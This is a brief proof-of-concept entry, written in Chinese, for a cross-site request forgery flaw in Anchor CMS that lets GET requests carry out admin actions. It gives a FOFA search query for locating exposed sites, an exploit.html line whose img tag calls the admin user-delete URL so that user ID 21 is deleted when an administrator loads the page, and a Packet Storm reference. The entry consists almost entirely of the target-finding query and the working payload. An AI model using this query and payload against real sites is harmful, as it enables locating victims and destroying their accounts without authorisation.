FOFA:
"Anchor CMS" && body="themes/default/img/favicon.png"
PoC:
Anchor CMS使用Get方法进行敏感操作,可以使用exploit.html进行删除用户等操作。
exploit.html:
<img src="http://target/anchor/index.php/admin/users/delete/21">当管理员点击时删除ID为21的用户。
ref:
https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt